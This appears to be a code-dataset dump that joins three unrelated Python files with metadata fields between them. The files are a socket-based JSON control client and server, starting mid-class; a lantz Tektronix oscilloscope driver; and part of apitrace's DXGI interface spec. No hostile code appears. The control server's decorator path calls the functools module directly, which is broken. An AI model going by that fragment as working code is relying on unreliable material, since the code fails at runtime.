handlers = base_handlers.copy()
def __init__(self, addr=None, sock=None, server=None):
self.addr = addr
self.sock = sock
self.server = server
self._line_buffer = ''
self._message_buffer = []
self._handler_reply_ids = None
self._session_generator = itertools.count(1)
if sock is None:
self.connect()
def connect(self):
# This is indempodent.
if self.sock is not None:
return
if self.addr is None:
return
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.connect(self.addr)
return True
def close(self):
if self.sock:
self.sock.close()
self.sock = None
def _readline(self, timeout=None):
if not self.sock:
return
if timeout:
end_time = time.time() + timeout
buffer_ = self._line_buffer
while True:
r, _, _ = select([self.sock], [], [], max(0, end_time - time.time()) if timeout else None)
if not r:
raise TimeOut()
new = self.sock.recv(4096)
if not new:
self.sock = None
self._line_buffer = ''
return
buffer_ += new
if '\n' in buffer_:
line, buffer_ = buffer_.split('\n', 1)
self._line_buffer = buffer_
return line
def recv(self, timeout=None):
try:
return self._message_buffer.pop(0)
except IndexError:
pass
for attempt_num in (0, 1):
self.connect()
try:
line = self._readline(timeout)
except socket.error as e:
if attempt_num:
raise
if line:
try:
return json.loads(line)
except:
self.send('error', message='malformed message')
self.close()
return
if attempt_num:
return
def recv_for(self, wait_id, timeout=None):
for i in xrange(len(self._message_buffer)):
msg = self._message_buffer[i]
if msg.get('for') == wait_id:
self._message_buffer.pop(i)
return msg
while True:
msg = self.recv(timeout)
if not msg:
return
if msg.get('for') == wait_id:
return msg
self._message_buffer.append(msg)
def send(self, *args, **kwargs):
msg = _coerce_msg(*args, **kwargs)
wait_id = msg.get('wait')
if wait_id is True:
wait_id = msg['wait'] = next(self._session_generator)
encoded = json.dumps(msg)
# Track what has been sent automatically.
if wait_id is not None and self._handler_reply_ids is not None:
self._handler_reply_ids.add(wait_id)
# Attempt to reconnect a couple times when sending this.
for attempt_num in (0, 1):
self.connect()
try:
self.sock.send(encoded + '\n')
except socket.error as e:
if attempt_num:
raise
return wait_id
def reply_to(self, original, *args, **kwargs):
wait_id = original.get('wait')
if wait_id is None:
raise ValueError('original message has no session')
msg = _coerce_msg(*args, **kwargs)
msg['for'] = wait_id
self.send(msg)
def send_and_recv(self, type, **kwargs):
timeout = kwargs.pop('timeout')
msg = _coerce_msg(type, **kwargs)
msg['wait'] = True
wait_id = self.send(msg)
return self.recv_for(wait_id, timeout)
def ping(self, timeout=None):
return self.send_and_recv('ping', pid=os.getpid(), timeout=timeout)
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
msg = self.recv()
if not msg:
return
type_ = msg.get('type')
wait_id = msg.get('wait')
func = self.handlers.get(type_)
if func is None and self.server:
func = self.server.handlers.get(type_)
if func is None:
log.warning('unknown message type %r' % type_)
self.reply_to(msg, 'error', message='unknown message type %r' % type_)
continue
if self.server and self.server.name:
log.info('%s handling %s' % (self.server.name, type_))
else:
log.info('handling %s' % type_)
self._handler_reply_ids = set()
try:
res = func(self, msg)
except Exception as e:
self.reply_to(msg, 'error', message='unhandled exception %s' % e)
continue
# If the handler replied, then we are done.
if res is None and wait_id is None or wait_id in self._handler_reply_ids:
continue
res = res.copy() if isinstance(res, dict) and 'type' in res else {'type': 'result', 'value': res}
if wait_id is not None:
res['for'] = wait_id
self.send(res)
class ControlServer(object):
def __init__(self, addr, name=None):
self.addr = addr
self.name = name
self.handlers = base_handlers.copy()
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
if os.path.exists(self.addr):
# TODO: Try connecting to it before destroying it.
unlink(self.addr)
makedirs(os.path.dirname(self.addr))
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.bind(self.addr)
self.sock.listen(5)
def register(self, func=None, **kwargs):
if func is None:
return functools(self.register(**kwargs))
self.handlers[kwargs.get('name') or func.__name__] = func
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
try:
client_sock, addr = self.sock.accept()
except socket.timeout:
continue
client = ControlClient(sock=client_sock, server=self)
client.loop(async=True) | en | 0.941029 | # This is indempodent. # Track what has been sent automatically. # Attempt to reconnect a couple times when sending this. # If the handler replied, then we are done. # TODO: Try connecting to it before destroying it. | 2.278804 | 2 |
lantz/drivers/tektronix/tds1002b.py | mtsolmn/lantz-drivers | 4 | 8517 | <reponame>mtsolmn/lantz-drivers
# -*- coding: utf-8 -*-
"""
lantz.drivers.tektronix.tds1012
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements the drivers to control an oscilloscope.
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from lantz.core import Feat, MessageBasedDriver
class TDS1002b(MessageBasedDriver):
MANUFACTURER_ID = '0x699'
MODEL_CODE = '0x363'
@Feat(read_once=True)
def idn(self):
return self.query('*IDN?')
| # -*- coding: utf-8 -*-
"""
lantz.drivers.tektronix.tds1012
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements the drivers to control an oscilloscope.
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from lantz.core import Feat, MessageBasedDriver
class TDS1002b(MessageBasedDriver):
MANUFACTURER_ID = '0x699'
MODEL_CODE = '0x363'
@Feat(read_once=True)
def idn(self):
return self.query('*IDN?') | en | 0.660387 | # -*- coding: utf-8 -*- lantz.drivers.tektronix.tds1012 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Implements the drivers to control an oscilloscope. :copyright: 2015 by Lantz Authors, see AUTHORS for more details. :license: BSD, see LICENSE for more details. | 1.875044 | 2 |
specs/dxgi.py | linkmauve/apitrace | 1 | 8518 | ##########################################################################
#
# Copyright 2014 VMware, Inc
# Copyright 2011 <NAME>
# All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
##########################################################################/
from .winapi import *
DXGI_FORMAT = Enum("DXGI_FORMAT", [
"DXGI_FORMAT_UNKNOWN",
"DXGI_FORMAT_R32G32B32A32_TYPELESS",
"DXGI_FORMAT_R32G32B32A32_FLOAT",
"DXGI_FORMAT_R32G32B32A32_UINT",
"DXGI_FORMAT_R32G32B32A32_SINT",
"DXGI_FORMAT_R32G32B32_TYPELESS",
"DXGI_FORMAT_R32G32B32_FLOAT",
"DXGI_FORMAT_R32G32B32_UINT",
"DXGI_FORMAT_R32G32B32_SINT",
"DXGI_FORMAT_R16G16B16A16_TYPELESS",
"DXGI_FORMAT_R16G16B16A16_FLOAT",
"DXGI_FORMAT_R16G16B16A16_UNORM",
"DXGI_FORMAT_R16G16B16A16_UINT",
"DXGI_FORMAT_R16G16B16A16_SNORM",
"DXGI_FORMAT_R16G16B16A16_SINT",
"DXGI_FORMAT_R32G32_TYPELESS",
"DXGI_FORMAT_R32G32_FLOAT",
"DXGI_FORMAT_R32G32_UINT",
"DXGI_FORMAT_R32G32_SINT",
"DXGI_FORMAT_R32G8X24_TYPELESS",
"DXGI_FORMAT_D32_FLOAT_S8X24_UINT",
"DXGI_FORMAT_R32_FLOAT_X8X24_TYPELESS",
"DXGI_FORMAT_X32_TYPELESS_G8X24_UINT",
"DXGI_FORMAT_R10G10B10A2_TYPELESS",
"DXGI_FORMAT_R10G10B10A2_UNORM",
"DXGI_FORMAT_R10G10B10A2_UINT",
"DXGI_FORMAT_R11G11B10_FLOAT",
"DXGI_FORMAT_R8G8B8A8_TYPELESS",
"DXGI_FORMAT_R8G8B8A8_UNORM",
"DXGI_FORMAT_R8G8B8A8_UNORM_SRGB",
"DXGI_FORMAT_R8G8B8A8_UINT",
"DXGI_FORMAT_R8G8B8A8_SNORM",
"DXGI_FORMAT_R8G8B8A8_SINT",
"DXGI_FORMAT_R16G16_TYPELESS",
"DXGI_FORMAT_R16G16_FLOAT",
"DXGI_FORMAT_R16G16_UNORM",
"DXGI_FORMAT_R16G16_UINT",
"DXGI_FORMAT_R16G16_SNORM",
"DXGI_FORMAT_R16G16_SINT",
"DXGI_FORMAT_R32_TYPELESS",
"DXGI_FORMAT_D32_FLOAT",
"DXGI_FORMAT_R32_FLOAT",
"DXGI_FORMAT_R32_UINT",
"DXGI_FORMAT_R32_SINT",
"DXGI_FORMAT_R24G8_TYPELESS",
"DXGI_FORMAT_D24_UNORM_S8_UINT",
"DXGI_FORMAT_R24_UNORM_X8_TYPELESS",
"DXGI_FORMAT_X24_TYPELESS_G8_UINT",
"DXGI_FORMAT_R8G8_TYPELESS",
"DXGI_FORMAT_R8G8_UNORM",
"DXGI_FORMAT_R8G8_UINT",
"DXGI_FORMAT_R8G8_SNORM",
"DXGI_FORMAT_R8G8_SINT",
"DXGI_FORMAT_R16_TYPELESS",
"DXGI_FORMAT_R16_FLOAT",
"DXGI_FORMAT_D16_UNORM",
"DXGI_FORMAT_R16_UNORM",
"DXGI_FORMAT_R16_UINT",
"DXGI_FORMAT_R16_SNORM",
"DXGI_FORMAT_R16_SINT",
"DXGI_FORMAT_R8_TYPELESS",
"DXGI_FORMAT_R8_UNORM",
"DXGI_FORMAT_R8_UINT",
"DXGI_FORMAT_R8_SNORM",
"DXGI_FORMAT_R8_SINT",
"DXGI_FORMAT_A8_UNORM",
"DXGI_FORMAT_R1_UNORM",
"DXGI_FORMAT_R9G9B9E5_SHAREDEXP",
"DXGI_FORMAT_R8G8_B8G8_UNORM",
"DXGI_FORMAT_G8R8_G8B8_UNORM",
"DXGI_FORMAT_BC1_TYPELESS",
"DXGI_FORMAT_BC1_UNORM",
"DXGI_FORMAT_BC1_UNORM_SRGB",
"DXGI_FORMAT_BC2_TYPELESS",
"DXGI_FORMAT_BC2_UNORM",
"DXGI_FORMAT_BC2_UNORM_SRGB",
"DXGI_FORMAT_BC3_TYPELESS",
"DXGI_FORMAT_BC3_UNORM",
"DXGI_FORMAT_BC3_UNORM_SRGB",
"DXGI_FORMAT_BC4_TYPELESS",
"DXGI_FORMAT_BC4_UNORM",
"DXGI_FORMAT_BC4_SNORM",
"DXGI_FORMAT_BC5_TYPELESS",
"DXGI_FORMAT_BC5_UNORM",
"DXGI_FORMAT_BC5_SNORM",
"DXGI_FORMAT_B5G6R5_UNORM",
"DXGI_FORMAT_B5G5R5A1_UNORM",
"DXGI_FORMAT_B8G8R8A8_UNORM",
"DXGI_FORMAT_B8G8R8X8_UNORM",
"DXGI_FORMAT_R10G10B10_XR_BIAS_A2_UNORM",
"DXGI_FORMAT_B8G8R8A8_TYPELESS",
"DXGI_FORMAT_B8G8R8A8_UNORM_SRGB",
"DXGI_FORMAT_B8G8R8X8_TYPELESS",
"DXGI_FORMAT_B8G8R8X8_UNORM_SRGB",
"DXGI_FORMAT_BC6H_TYPELESS",
"DXGI_FORMAT_BC6H_UF16",
"DXGI_FORMAT_BC6H_SF16",
"DXGI_FORMAT_BC7_TYPELESS",
"DXGI_FORMAT_BC7_UNORM",
"DXGI_FORMAT_BC7_UNORM_SRGB",
"DXGI_FORMAT_AYUV",
"DXGI_FORMAT_Y410",
"DXGI_FORMAT_Y416",
"DXGI_FORMAT_NV12",
"DXGI_FORMAT_P010",
"DXGI_FORMAT_P016",
"DXGI_FORMAT_420_OPAQUE",
"DXGI_FORMAT_YUY2",
"DXGI_FORMAT_Y210",
"DXGI_FORMAT_Y216",
"DXGI_FORMAT_NV11",
"DXGI_FORMAT_AI44",
"DXGI_FORMAT_IA44",
"DXGI_FORMAT_P8",
"DXGI_FORMAT_A8P8",
"DXGI_FORMAT_B4G4R4A4_UNORM",
])
HRESULT = MAKE_HRESULT([
"DXGI_STATUS_OCCLUDED",
"DXGI_STATUS_CLIPPED",
"DXGI_STATUS_NO_REDIRECTION",
"DXGI_STATUS_NO_DESKTOP_ACCESS",
"DXGI_STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_STATUS_MODE_CHANGED",
"DXGI_STATUS_MODE_CHANGE_IN_PROGRESS",
"DXGI_ERROR_INVALID_CALL",
"DXGI_ERROR_NOT_FOUND",
"DXGI_ERROR_MORE_DATA",
"DXGI_ERROR_UNSUPPORTED",
"DXGI_ERROR_DEVICE_REMOVED",
"DXGI_ERROR_DEVICE_HUNG",
"DXGI_ERROR_DEVICE_RESET",
"DXGI_ERROR_WAS_STILL_DRAWING",
"DXGI_ERROR_FRAME_STATISTICS_DISJOINT",
"DXGI_ERROR_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_ERROR_DRIVER_INTERNAL_ERROR",
"DXGI_ERROR_NONEXCLUSIVE",
"DXGI_ERROR_NOT_CURRENTLY_AVAILABLE",
"DXGI_ERROR_REMOTE_CLIENT_DISCONNECTED",
"DXGI_ERROR_REMOTE_OUTOFMEMORY",
# IDXGIKeyedMutex::AcquireSync
"WAIT_ABANDONED",
"WAIT_TIMEOUT",
])
DXGI_RGB = Struct("DXGI_RGB", [
(Float, "Red"),
(Float, "Green"),
(Float, "Blue"),
])
DXGI_GAMMA_CONTROL = Struct("DXGI_GAMMA_CONTROL", [
(DXGI_RGB, "Scale"),
(DXGI_RGB, "Offset"),
(Array(DXGI_RGB, 1025), "GammaCurve"),
])
DXGI_GAMMA_CONTROL_CAPABILITIES = Struct("DXGI_GAMMA_CONTROL_CAPABILITIES", [
(BOOL, "ScaleAndOffsetSupported"),
(Float, "MaxConvertedValue"),
(Float, "MinConvertedValue"),
(UINT, "NumGammaControlPoints"),
(Array(Float, "{self}.NumGammaControlPoints"), "ControlPointPositions"),
])
DXGI_RATIONAL = Struct("DXGI_RATIONAL", [
(UINT, "Numerator"),
(UINT, "Denominator"),
])
DXGI_MODE_SCANLINE_ORDER = Enum("DXGI_MODE_SCANLINE_ORDER", [
"DXGI_MODE_SCANLINE_ORDER_UNSPECIFIED",
"DXGI_MODE_SCANLINE_ORDER_PROGRESSIVE",
"DXGI_MODE_SCANLINE_ORDER_UPPER_FIELD_FIRST",
"DXGI_MODE_SCANLINE_ORDER_LOWER_FIELD_FIRST",
])
DXGI_MODE_SCALING = Enum("DXGI_MODE_SCALING", [
"DXGI_MODE_SCALING_UNSPECIFIED",
"DXGI_MODE_SCALING_CENTERED",
"DXGI_MODE_SCALING_STRETCHED",
])
DXGI_MODE_ROTATION = Enum("DXGI_MODE_ROTATION", [
"DXGI_MODE_ROTATION_UNSPECIFIED",
"DXGI_MODE_ROTATION_IDENTITY",
"DXGI_MODE_ROTATION_ROTATE90",
"DXGI_MODE_ROTATION_ROTATE180",
"DXGI_MODE_ROTATION_ROTATE270",
])
DXGI_MODE_DESC = Struct("DXGI_MODE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
])
DXGI_QUALITY_LEVEL = FakeEnum(UINT, [
"DXGI_STANDARD_MULTISAMPLE_QUALITY_PATTERN",
"DXGI_CENTER_MULTISAMPLE_QUALITY_PATTERN",
])
DXGI_SAMPLE_DESC = Struct("DXGI_SAMPLE_DESC", [
(UINT, "Count"),
(DXGI_QUALITY_LEVEL, "Quality"),
])
DXGI_RGBA = Struct("DXGI_RGBA", [
(Float, "r"),
(Float, "g"),
(Float, "b"),
(Float, "a"),
])
IDXGIObject = Interface("IDXGIObject", IUnknown)
IDXGIDeviceSubObject = Interface("IDXGIDeviceSubObject", IDXGIObject)
IDXGIResource = Interface("IDXGIResource", IDXGIDeviceSubObject)
IDXGIKeyedMutex = Interface("IDXGIKeyedMutex", IDXGIDeviceSubObject)
IDXGISurface = Interface("IDXGISurface", IDXGIDeviceSubObject)
IDXGISurface1 = Interface("IDXGISurface1", IDXGISurface)
IDXGIAdapter = Interface("IDXGIAdapter", IDXGIObject)
IDXGIOutput = Interface("IDXGIOutput", IDXGIObject)
IDXGISwapChain = Interface("IDXGISwapChain", IDXGIDeviceSubObject)
IDXGIFactory = Interface("IDXGIFactory", IDXGIObject)
IDXGIDevice = Interface("IDXGIDevice", IDXGIObject)
IDXGIFactory1 = Interface("IDXGIFactory1", IDXGIFactory)
IDXGIAdapter1 = Interface("IDXGIAdapter1", IDXGIAdapter)
IDXGIDevice1 = Interface("IDXGIDevice1", IDXGIDevice)
DXGI_USAGE = Flags(UINT, [
"DXGI_CPU_ACCESS_NONE", # 0
"DXGI_CPU_ACCESS_SCRATCH", # 3
"DXGI_CPU_ACCESS_DYNAMIC", # 1
"DXGI_CPU_ACCESS_READ_WRITE", # 2
"DXGI_USAGE_SHADER_INPUT",
"DXGI_USAGE_RENDER_TARGET_OUTPUT",
"DXGI_USAGE_BACK_BUFFER",
"DXGI_USAGE_SHARED",
"DXGI_USAGE_READ_ONLY",
"DXGI_USAGE_DISCARD_ON_PRESENT",
"DXGI_USAGE_UNORDERED_ACCESS",
])
DXGI_FRAME_STATISTICS = Struct("DXGI_FRAME_STATISTICS", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
])
DXGI_MAPPED_RECT = Struct("DXGI_MAPPED_RECT", [
(INT, "Pitch"),
(LinearPointer(BYTE, "_MappedSize"), "pBits"),
])
DXGI_ADAPTER_DESC = Struct("DXGI_ADAPTER_DESC", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
])
DXGI_OUTPUT_DESC = Struct("DXGI_OUTPUT_DESC", [
(WString, "DeviceName"),
(RECT, "DesktopCoordinates"),
(BOOL, "AttachedToDesktop"),
(DXGI_MODE_ROTATION, "Rotation"),
(HMONITOR, "Monitor"),
])
DXGI_SHARED_RESOURCE = Struct("DXGI_SHARED_RESOURCE", [
(HANDLE, "Handle"),
])
DXGI_RESOURCE_PRIORITY = FakeEnum(UINT, [
"DXGI_RESOURCE_PRIORITY_MINIMUM",
"DXGI_RESOURCE_PRIORITY_LOW",
"DXGI_RESOURCE_PRIORITY_NORMAL",
"DXGI_RESOURCE_PRIORITY_HIGH",
"DXGI_RESOURCE_PRIORITY_MAXIMUM",
])
DXGI_RESIDENCY = Enum("DXGI_RESIDENCY", [
"DXGI_RESIDENCY_FULLY_RESIDENT",
"DXGI_RESIDENCY_RESIDENT_IN_SHARED_MEMORY",
"DXGI_RESIDENCY_EVICTED_TO_DISK",
])
DXGI_SURFACE_DESC = Struct("DXGI_SURFACE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
])
DXGI_SWAP_EFFECT = Enum("DXGI_SWAP_EFFECT", [
"DXGI_SWAP_EFFECT_DISCARD",
"DXGI_SWAP_EFFECT_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_DISCARD",
])
DXGI_SWAP_CHAIN_FLAG = Flags(UINT, [
"DXGI_SWAP_CHAIN_FLAG_NONPREROTATED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH",
"DXGI_SWAP_CHAIN_FLAG_GDI_COMPATIBLE",
"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_CONTENT",
"DXGI_SWAP_CHAIN_FLAG_RESTRICT_SHARED_RESOURCE_DRIVER",
"DXGI_SWAP_CHAIN_FLAG_DISPLAY_ONLY",
"DXGI_SWAP_CHAIN_FLAG_FRAME_LATENCY_WAITABLE_OBJECT",
"DXGI_SWAP_CHAIN_FLAG_FOREGROUND_LAYER",
"DXGI_SWAP_CHAIN_FLAG_FULLSCREEN_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_YUV_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_HW_PROTECTED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_TEARING",
#"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_TO_ALL_HOLOGRAPHIC_DISPLAYS", # DXGI 1.6
])
DXGI_SWAP_CHAIN_DESC = Struct("DXGI_SWAP_CHAIN_DESC", [
(DXGI_MODE_DESC, "BufferDesc"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(HWND, "OutputWindow"),
(BOOL, "Windowed"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
IDXGIObject.methods += [
StdMethod(HRESULT, "SetPrivateData", [(REFGUID, "Name"), (UINT, "DataSize"), (OpaqueBlob(Const(Void), "DataSize"), "pData")], sideeffects=False),
StdMethod(HRESULT, "SetPrivateDataInterface", [(REFGUID, "Name"), (OpaquePointer(Const(IUnknown)), "pUnknown")], sideeffects=False),
StdMethod(HRESULT, "GetPrivateData", [(REFGUID, "Name"), InOut(Pointer(UINT), "pDataSize"), Out(OpaquePointer(Void), "pData")], sideeffects=False),
StdMethod(HRESULT, "GetParent", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParent")]),
]
IDXGIDeviceSubObject.methods += [
StdMethod(HRESULT, "GetDevice", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppDevice")]),
]
SHARED_HANDLE = Handle("shared_handle", RAW_HANDLE)
IDXGIResource.methods += [
StdMethod(HRESULT, "GetSharedHandle", [Out(Pointer(SHARED_HANDLE), "pSharedHandle")]),
StdMethod(HRESULT, "GetUsage", [Out(Pointer(DXGI_USAGE), "pUsage")], sideeffects=False),
StdMethod(HRESULT, "SetEvictionPriority", [(DXGI_RESOURCE_PRIORITY, "EvictionPriority")]),
StdMethod(HRESULT, "GetEvictionPriority", [Out(Pointer(DXGI_RESOURCE_PRIORITY), "pEvictionPriority")], sideeffects=False),
]
DWORD_TIMEOUT = FakeEnum(DWORD, [
"INFINITE",
])
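# Hedged note: DWORD_TIMEOUT is presumably modelled as a FakeEnum so that the
# well-known INFINITE timeout is printed by name in traces, while ordinary
# millisecond values remain plain numbers.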
IDXGIKeyedMutex.methods += [
StdMethod(HRESULT, "AcquireSync", [(UINT64, "Key"), (DWORD_TIMEOUT, "dwMilliseconds")], sideeffects=False),
StdMethod(HRESULT, "ReleaseSync", [(UINT64, "Key")]),
]
DXGI_MAP = Flags(UINT, [
"DXGI_MAP_READ",
"DXGI_MAP_WRITE",
"DXGI_MAP_DISCARD",
])
IDXGISurface.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SURFACE_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "Map", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect"), (DXGI_MAP, "MapFlags")]),
StdMethod(HRESULT, "Unmap", []),
]
IDXGISurface1.methods += [
StdMethod(HRESULT, "GetDC", [(BOOL, "Discard"), Out(Pointer(HDC), "phdc")]),
StdMethod(HRESULT, "ReleaseDC", [(Pointer(RECT), "pDirtyRect")]),
]
IDXGIAdapter.methods += [
StdMethod(HRESULT, "EnumOutputs", [(UINT, "Output"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_ADAPTER_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "CheckInterfaceSupport", [(REFGUID, "InterfaceName"), Out(Pointer(LARGE_INTEGER), "pUMDVersion")], sideeffects=False),
]
DXGI_ENUM_MODES = Flags(UINT, [
"DXGI_ENUM_MODES_INTERLACED",
"DXGI_ENUM_MODES_SCALING",
"DXGI_ENUM_MODES_STEREO",
"DXGI_ENUM_MODES_DISABLED_STEREO",
])
IDXGIOutput.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_OUTPUT_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "GetDisplayModeList", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode", [(Pointer(Const(DXGI_MODE_DESC)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "WaitForVBlank", []),
StdMethod(HRESULT, "TakeOwnership", [(ObjPointer(IUnknown), "pDevice"), (BOOL, "Exclusive")]),
StdMethod(Void, "ReleaseOwnership", []),
StdMethod(HRESULT, "GetGammaControlCapabilities", [Out(Pointer(DXGI_GAMMA_CONTROL_CAPABILITIES), "pGammaCaps")], sideeffects=False),
StdMethod(HRESULT, "SetGammaControl", [(Pointer(Const(DXGI_GAMMA_CONTROL)), "pArray")], sideeffects=False), # Avoid NumGammaControlPoints mismatch
StdMethod(HRESULT, "GetGammaControl", [Out(Pointer(DXGI_GAMMA_CONTROL), "pArray")], sideeffects=False),
StdMethod(HRESULT, "SetDisplaySurface", [(ObjPointer(IDXGISurface), "pScanoutSurface")]),
StdMethod(HRESULT, "GetDisplaySurfaceData", [(ObjPointer(IDXGISurface), "pDestination")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
]
DXGI_PRESENT = Flags(UINT, [
"DXGI_PRESENT_TEST",
"DXGI_PRESENT_DO_NOT_SEQUENCE",
"DXGI_PRESENT_RESTART",
"DXGI_PRESENT_DO_NOT_WAIT",
"DXGI_PRESENT_STEREO_PREFER_RIGHT",
"DXGI_PRESENT_STEREO_TEMPORARY_MONO",
"DXGI_PRESENT_RESTRICT_TO_OUTPUT",
"DXGI_PRESENT_USE_DURATION",
])
IDXGISwapChain.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "SetFullscreenState", [(BOOL, "Fullscreen"), (ObjPointer(IDXGIOutput), "pTarget")]),
StdMethod(HRESULT, "GetFullscreenState", [Out(Pointer(BOOL), "pFullscreen"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppTarget")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
DXGI_MWA = Flags(UINT, [
"DXGI_MWA_NO_WINDOW_CHANGES",
"DXGI_MWA_NO_ALT_ENTER",
"DXGI_MWA_NO_PRINT_SCREEN",
"DXGI_MWA_VALID",
])
IDXGIFactory.methods += [
StdMethod(HRESULT, "EnumAdapters", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
StdMethod(HRESULT, "MakeWindowAssociation", [(HWND, "WindowHandle"), (DXGI_MWA, "Flags")], sideeffects=False),
StdMethod(HRESULT, "GetWindowAssociation", [Out(Pointer(HWND), "pWindowHandle")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), Out(Pointer(ObjPointer(IDXGISwapChain)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSoftwareAdapter", [(HMODULE, "Module"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
]
IDXGIDevice.methods += [
StdMethod(HRESULT, "GetAdapter", [Out(Pointer(ObjPointer(IDXGIAdapter)), "pAdapter")]),
StdMethod(HRESULT, "CreateSurface", [(Pointer(Const(DXGI_SURFACE_DESC)), "pDesc"), (UINT, "NumSurfaces"), (DXGI_USAGE, "Usage"), (Pointer(Const(DXGI_SHARED_RESOURCE)), "pSharedResource"), Out(Pointer(ObjPointer(IDXGISurface)), "ppSurface")]),
